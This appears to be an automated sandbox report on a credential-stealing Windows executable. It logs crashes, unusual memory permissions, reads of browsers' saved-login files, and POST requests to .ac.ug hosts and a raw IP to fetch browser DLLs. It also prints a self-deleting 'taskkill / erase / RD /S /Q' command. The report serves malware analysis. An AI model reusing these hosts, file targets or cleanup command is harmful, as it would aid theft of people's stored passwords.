RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 00 ec 00 00
exception.symbol: ghjk+0x1959
exception.instruction: add byte ptr [eax], al
exception.module: ghjk.exe
exception.exception_code: 0xc0000005
exception.offset: 6489
exception.address: 0x401959
registers.esp: 1637384
registers.edi: 1
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
ghjk+0x2456 @ 0x402456
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 00 ec 00 00 00
exception.symbol: ghjk+0x195a
exception.instruction: add byte ptr [eax], al
exception.module: ghjk.exe
exception.exception_code: 0xc0000005
exception.offset: 6490
exception.address: 0x40195a
registers.esp: 1637384
registers.edi: 1
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
ghjk+0x2456 @ 0x402456
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 00 ec 00 00 00 00
exception.symbol: ghjk+0x195b
exception.instruction: add byte ptr [eax], al
exception.module: ghjk.exe
exception.exception_code: 0xc0000005
exception.offset: 6491
exception.address: 0x40195b
registers.esp: 1637384
registers.edi: 1
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
ghjk+0x2456 @ 0x402456
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 00 ec 00 00 00 00 00
exception.symbol: ghjk+0x195c
exception.instruction: add byte ptr [eax], al
exception.module: ghjk.exe
exception.exception_code: 0xc0000005
exception.offset: 6492
exception.address: 0x40195c
registers.esp: 1637384
registers.edi: 1
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
ghjk+0x2456 @ 0x402456
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 00 ec 00 00 00 00 00 00
exception.symbol: ghjk+0x195d
exception.instruction: add byte ptr [eax], al
exception.module: ghjk.exe
exception.exception_code: 0xc0000005
exception.offset: 6493
exception.address: 0x40195d
registers.esp: 1637384
registers.edi: 1
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

 stacktrace: 
EbLoadRunTime+0x1166 DllFunctionCall-0xb5 msvbvm60+0xa048 @ 0x7294a048
BASIC_CLASS_QueryInterface+0xeca EbLoadRunTime-0x13a4 msvbvm60+0x7b3e @ 0x72947b3e
ThunRTMain+0x3dd EbCreateContext-0x2e36 msvbvm60+0x3981 @ 0x72943981
ThunRTMain+0x156 EbCreateContext-0x30bd msvbvm60+0x36fa @ 0x729436fa
ThunRTMain+0x5c EbCreateContext-0x31b7 msvbvm60+0x3600 @ 0x72943600
ghjk+0x2456 @ 0x402456
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: 00 00 00 00 00 00 00 00 ec 00 00 00 00 00 00 00
exception.symbol: ghjk+0x195e
exception.instruction: add byte ptr [eax], al
exception.module: ghjk.exe
exception.exception_code: 0xc0000005
exception.offset: 6494
exception.address: 0x40195e
registers.esp: 1637384
registers.edi: 1
registers.eax: 0
registers.ebp: 1637724
registers.edx: 1923237542
registers.ebx: 0
registers.esi: 0
registers.ecx: 0
1 0 0
suspicious_features POST method with no referer header suspicious_request POST http://mazoyer.ac.ug/index.php
suspicious_features POST method with no referer header, POST method with no useragent header suspicious_request POST http://mazooyaar.ac.ug/softokn3.dll
suspicious_features POST method with no referer header, POST method with no useragent header suspicious_request POST http://mazooyaar.ac.ug/sqlite3.dll
suspicious_features POST method with no referer header, POST method with no useragent header suspicious_request POST http://mazooyaar.ac.ug/freebl3.dll
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://94.158.245.173/
suspicious_features POST method with no referer header, POST method with no useragent header suspicious_request POST http://mazooyaar.ac.ug/mozglue.dll
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://94.158.245.173//l/f/nxZPunsBPvGyIjkLqZcB/8a1a766b0ff5cb7f52f8e96a8dfe79ada77eeb30
suspicious_features POST method with no referer header, POST method with no useragent header suspicious_request POST http://mazooyaar.ac.ug/msvcp140.dll
suspicious_features POST method with no referer header, POST method with no useragent header suspicious_request POST http://mazooyaar.ac.ug/nss3.dll
suspicious_features POST method with no referer header, POST method with no useragent header suspicious_request POST http://mazooyaar.ac.ug/vcruntime140.dll
suspicious_features POST method with no referer header, POST method with no useragent header suspicious_request POST http://mazooyaar.ac.ug/main.php
suspicious_features POST method with no referer header, POST method with no useragent header suspicious_request POST http://mazooyaar.ac.ug/
suspicious_features GET method with no useragent header suspicious_request GET https://telete.in/brikitiki
request POST http://mazoyer.ac.ug/index.php
request POST http://mazooyaar.ac.ug/softokn3.dll
request POST http://mazooyaar.ac.ug/sqlite3.dll
request POST http://mazooyaar.ac.ug/freebl3.dll
request POST http://94.158.245.173/
request POST http://mazooyaar.ac.ug/mozglue.dll
request GET http://94.158.245.173//l/f/nxZPunsBPvGyIjkLqZcB/8a1a766b0ff5cb7f52f8e96a8dfe79ada77eeb30
request POST http://mazooyaar.ac.ug/msvcp140.dll
request POST http://mazooyaar.ac.ug/nss3.dll
request POST http://mazooyaar.ac.ug/vcruntime140.dll
request POST http://mazooyaar.ac.ug/main.php
request POST http://mazooyaar.ac.ug/
request GET https://telete.in/brikitiki
request POST http://mazoyer.ac.ug/index.php
request POST http://mazooyaar.ac.ug/softokn3.dll
request POST http://mazooyaar.ac.ug/sqlite3.dll
request POST http://mazooyaar.ac.ug/freebl3.dll
request POST http://94.158.245.173/
request POST http://mazooyaar.ac.ug/mozglue.dll
request POST http://mazooyaar.ac.ug/msvcp140.dll
request POST http://mazooyaar.ac.ug/nss3.dll
request POST http://mazooyaar.ac.ug/vcruntime140.dll
request POST http://mazooyaar.ac.ug/main.php
request POST http://mazooyaar.ac.ug/
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72d72000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00550000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x773bf000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2776
region_size: 28672
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x03440000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 204
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72d72000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 204
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01dd0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 204
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x773bf000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 204
region_size: 28672
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01de0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1824
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72d72000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1824
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00560000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1824
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x773bf000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1824
region_size: 28672
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00770000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1304
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003c0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1304
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x773bf000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1808
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003c0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1808
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x773bf000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2364
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003c0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2364
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x773bf000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2364
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72d72000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 13711798272
free_bytes_available: 13711798272
root_path: C:\
total_number_of_bytes: 34252779520
1 1 0
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\First Run\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Channel IDs\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Cookies\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Channel IDs-journal\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateRevocation\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics-spare.pma\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Subresource Filter\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Cookies-journal\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\PnaclTranslationCache\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics.pma~RF3a15fe.TMP\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-active.pma\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\chrome_shutdown_ms.txt\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\SwReporter\Login Data
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\Login Data
file C:\Users\test22\AppData\Local\Chromium\User Data\WidevineCdm\Login Data
file C:\Users\test22\AppData\Local\Chromium\User Data\Local State
file C:\Users\test22\AppData\Local\Nichrome\User Data\Local State
file C:\Users\test22\AppData\Local\Nichrome\User Data\WidevineCdm\Login Data
file C:\Users\test22\AppData\Local\Bromium\User Data\WidevineCdm\Login Data
file C:\Users\test22\AppData\Local\RockMelt\User Data\WidevineCdm\Login Data
file C:\Users\test22\AppData\Local\Yandex\YandexBrowser\User Data\WidevineCdm\Login Data
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-localization-l1-2-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-file-l1-2-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-convert-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-synch-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-locale-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\nss3.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-heap-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-conio-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-utility-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-libraryloader-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-errorhandling-l1-1-0.dll
file C:\ProgramData\vcruntime140.dll
file C:\ProgramData\mozglue.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-timezone-l1-1-0.dll
file C:\ProgramData\sqlite3.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\ucrtbase.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-datetime-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-stdio-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-synch-l1-2-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\softokn3.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-multibyte-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-interlocked-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-runtime-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-util-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-string-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-file-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-memory-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-rtlsupport-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-string-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-environment-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\vcxfse.exe
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-time-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\mozglue.dll
file C:\ProgramData\msvcp140.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\freebl3.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-processthreads-l1-1-1.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-private-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-console-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-file-l2-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-heap-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\sqlite3.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\nssdbm3.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-processenvironment-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-filesystem-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-math-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-processthreads-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-sysinfo-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\vcruntime140.dll
file C:\ProgramData\softokn3.dll
file C:\Users\test22\AppData\Local\Temp\cbvjns.exe
cmdline cmd.exe /c taskkill /pid 2364 & erase C:\Users\test22\AppData\Local\Temp\vcxfse.exe & RD /S /Q C:\\ProgramData\\404534644891112\\* & exit
cmdline "C:\Windows\System32\cmd.exe" /c taskkill /pid 2364 & erase C:\Users\test22\AppData\Local\Temp\vcxfse.exe & RD /S /Q C:\\ProgramData\\404534644891112\\* & exit
file C:\Users\test22\AppData\Local\Temp\vcxfse.exe
file C:\Users\test22\AppData\Local\Temp\cbvjns.exe
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-synch-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-file-l2-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-locale-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-private-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-debug-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\nss3.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-namedpipe-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-libraryloader-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\vcxfse.exe
file C:\Users\test22\AppData\Local\Temp\E1070B8B\freebl3.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-environment-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-heap-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-time-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\mozglue.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-math-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-string-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-memory-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-sysinfo-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-util-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\cbvjns.exe
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-localization-l1-2-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-processthreads-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-filesystem-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-stdio-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\nssdbm3.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-errorhandling-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-utility-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-console-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-processthreads-l1-1-1.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-heap-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-file-l1-1-0.dll
file C:\Users\test22\AppData\LocalLow\sqlite3.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\ucrtbase.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-processenvironment-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-datetime-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-handle-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-timezone-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-synch-l1-2-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-conio-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-file-l1-2-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\softokn3.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-interlocked-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-profile-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-multibyte-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-core-rtlsupport-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-string-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-convert-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-runtime-l1-1-0.dll
file C:\Users\test22\AppData\Local\Temp\E1070B8B\api-ms-win-crt-process-l1-1-0.dll
wmi SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( ProcessId = 2364)
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: cmd.exe
parameters: /c taskkill /pid 2364 & erase C:\Users\test22\AppData\Local\Temp\vcxfse.exe & RD /S /Q C:\\ProgramData\\404534644891112\\* & exit
filepath: cmd.exe
1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 24576
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x003f0000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

InternetReadFile

 buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $¢l$æ JOæ JOæ JOïuÙOê JO?oKNä JO?oINä JO?oONì JO?oNNí JOÄmKNä JO-nKNå JOæ KO~ JO-nNNò JO-nJNç JO-nµOç JO-nHNç JORichæ JOPEL¿bë[à"!  ¶b—¼ÐP ±@¨¸È0xÐ@`ÐþT(ÿ@Ðl.textË´¶ `.rdata DÐFº@@.data @À.rsrcx0@@.reloc`@@B
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELê˜=Sv? à! ÐàXà` 8à  °˜ÐL ü'ð¬Ñp.textÀÎÐ`0`.data°àÖ@@À.rdata$­ð®æ@@@.bss˜ €@À.edata˜°”@0@.idataL Ð ®@0À.CRTàº@0À.tls ð¼@0À.relocü'(¾@0B/4`0æ@@B/19È@è@B/35MPì@B/51`C`Dô@B/63„ °8@B/77” À F@B/89ÐR
request_handle: 0x00cc000c
1 1 0

InternetReadFile

